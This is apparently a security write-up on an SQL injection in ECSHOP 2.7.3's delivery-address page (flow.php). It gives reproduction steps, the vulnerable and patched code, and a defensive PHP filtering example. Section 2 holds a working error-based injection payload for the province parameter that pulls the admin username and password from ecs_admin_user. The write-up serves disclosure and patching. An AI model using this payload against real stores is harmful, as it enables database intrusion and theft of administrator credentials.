Contents
1. Vulnerability description
2. Trigger conditions
3. Affected scope
4. Vulnerable code analysis
5. Defence
6. Offence and defence considerations
1. Vulnerability description
The delivery-address page of ECSHOP does not validate the region parameters, so it contains an SQL injection vulnerability. An attacker can use a browser add-on such as Firefox Tamper Data to modify the POST data submitted to the delivery-address page, leading to unauthorized database operations and even arbitrary code execution.
Relevant Link:
http://sebug.net/vuldb/ssvid-60554
2. Trigger conditions
1. First register an account, put any product into the shopping cart, then fill in the address, telephone and so on.
2. With any product in the cart, the page for filling in the delivery address has a region selector.
3. http://localhost/ecshop2.7.3/flow.php?step=consignee&direct_shopping=1 // for example, choose Anhui as the province
4. The POST data is as follows:
country=1&province=3&city=37&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=1111111111111111111&mobile=11111111&sign_building=111111111&best_time=111111111&Submit=%E9%85%8D%E9%80%81%E8%87%B3%E8%BF%99%E4%B8%AA%E5%9C%B0%E5%9D%80&step=consignee&act=checkout&address_id=
Using Firefox Tamper Data, change province=3 to:
province=3') and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 #
5. An error page is then echoed back.
Relevant Link:
http://www.2cto.com/Article/201212/179861.html
3. Affected scope
4. Vulnerable code analysis
/flow.php
elseif ($_REQUEST['step'] == 'consignee')
{
    ...
    // the POST data is not effectively filtered
    else
    {
        /*
         * Save the consignee information
         */
        $consignee = array(
            'address_id'    => empty($_POST['address_id'])    ? 0  : intval($_POST['address_id']),
            'consignee'     => empty($_POST['consignee'])     ? '' : trim($_POST['consignee']),
            // the region ids are taken from POST verbatim, so they are injectable
            'country'       => empty($_POST['country'])       ? '' : $_POST['country'],
            'province'      => empty($_POST['province'])      ? '' : $_POST['province'],
            'city'          => empty($_POST['city'])          ? '' : $_POST['city'],
            'district'      => empty($_POST['district'])      ? '' : $_POST['district'],
            'email'         => empty($_POST['email'])         ? '' : $_POST['email'],
            'address'       => empty($_POST['address'])       ? '' : $_POST['address'],
            'zipcode'       => empty($_POST['zipcode'])       ? '' : make_semiangle(trim($_POST['zipcode'])),
            'tel'           => empty($_POST['tel'])           ? '' : make_semiangle(trim($_POST['tel'])),
            'mobile'        => empty($_POST['mobile'])        ? '' : make_semiangle(trim($_POST['mobile'])),
            'sign_building' => empty($_POST['sign_building']) ? '' : $_POST['sign_building'],
            'best_time'     => empty($_POST['best_time'])     ? '' : $_POST['best_time'],
        );
        ...
5. Defence
/flow.php
elseif ($_REQUEST['step'] == 'consignee')
{
    ...
    else
    {
        /*
         * Save the consignee information
         */
        $consignee = array(
            /* effectively filter the user-supplied POST data */
            'address_id'    => empty($_POST['address_id'])    ? 0  : intval($_POST['address_id']),
            'consignee'     => empty($_POST['consignee'])     ? '' : compile_str(trim($_POST['consignee'])),
            // region ids are coerced to integers, so quotes and parentheses can no longer reach the SQL
            'country'       => empty($_POST['country'])       ? '' : intval($_POST['country']),
            'province'      => empty($_POST['province'])      ? '' : intval($_POST['province']),
            'city'          => empty($_POST['city'])          ? '' : intval($_POST['city']),
            'district'      => empty($_POST['district'])      ? '' : intval($_POST['district']),
            'email'         => empty($_POST['email'])         ? '' : compile_str($_POST['email']),
            'address'       => empty($_POST['address'])       ? '' : compile_str($_POST['address']),
            'zipcode'       => empty($_POST['zipcode'])       ? '' : compile_str(make_semiangle(trim($_POST['zipcode']))),
            'tel'           => empty($_POST['tel'])           ? '' : compile_str(make_semiangle(trim($_POST['tel']))),
            'mobile'        => empty($_POST['mobile'])        ? '' : compile_str(make_semiangle(trim($_POST['mobile']))),
            'sign_building' => empty($_POST['sign_building']) ? '' : compile_str($_POST['sign_building']),
            'best_time'     => empty($_POST['best_time'])     ? '' : compile_str($_POST['best_time']),
        );
        ...
6. Offence and defence considerations
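As an added example (not ECSHOP's own code), the following stand-alone PHP applies the same rule the patch uses: region ids are coerced with intval() and rejected unless positive, while free-text fields are escaped before they can be concatenated into SQL. filter_consignee() and escape_text() are names chosen for this example; escape_text() uses addslashes() as an assumed stand-in for ECSHOP's compile_str().

```php
<?php
// Added example, not part of ECSHOP. Mirrors the patched flow.php rule:
// integer fields via intval(), text fields escaped before any SQL use.

function escape_text(string $s): string
{
    // Assumption: addslashes() stands in for ECSHOP's compile_str(); it escapes
    // the quote and backslash characters that can close a quoted SQL literal.
    return addslashes(trim($s));
}

function filter_consignee(array $post): array
{
    $clean = array('address_id' => isset($post['address_id']) ? intval($post['address_id']) : 0);

    // Region ids must be positive integers. intval() keeps only the leading
    // digits, so a value such as "3') and 1=1 #" collapses to 3 and the
    // quote/parenthesis part never reaches the query string.
    foreach (array('country', 'province', 'city', 'district') as $key) {
        $id = isset($post[$key]) ? intval($post[$key]) : 0;
        $clean[$key] = ($id > 0) ? $id : 0;
    }

    // Free-text fields are escaped the way the patch wraps them in compile_str().
    foreach (array('consignee', 'email', 'address', 'zipcode', 'tel',
                   'mobile', 'sign_building', 'best_time') as $key) {
        $clean[$key] = isset($post[$key]) ? escape_text((string) $post[$key]) : '';
    }
    return $clean;
}

// Build the region lookup with the filtered integers only (constructed query,
// shown to make the point that no user-controlled string is concatenated).
function region_where(array $clean): string
{
    return sprintf('WHERE region_id IN (%d, %d, %d, %d)',
        $clean['country'], $clean['province'], $clean['city'], $clean['district']);
}

// Constructed sample input: province carries the quote-and-parenthesis prefix
// from the PoC above; consignee contains a literal single quote.
$sample = array(
    'country'    => '1',
    'province'   => "3') and 1=1 #",
    'city'       => '37',
    'district'   => '409',
    'consignee'  => "O'Brien",
    'address_id' => '',
);
$clean = filter_consignee($sample);
var_dump($clean['province'] === 3, $clean['consignee'] === "O\\'Brien");
echo region_where($clean), PHP_EOL;
```

Note that intval() only neutralises the region ids; the text fields still depend on the escaping function matching the database's quoting rules, which is why the patch routes them through compile_str() rather than trusting trim() alone.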
Copyright (c) 2015 LittleHann All rights reserved
ecshop /flow.php SQL Injection Vul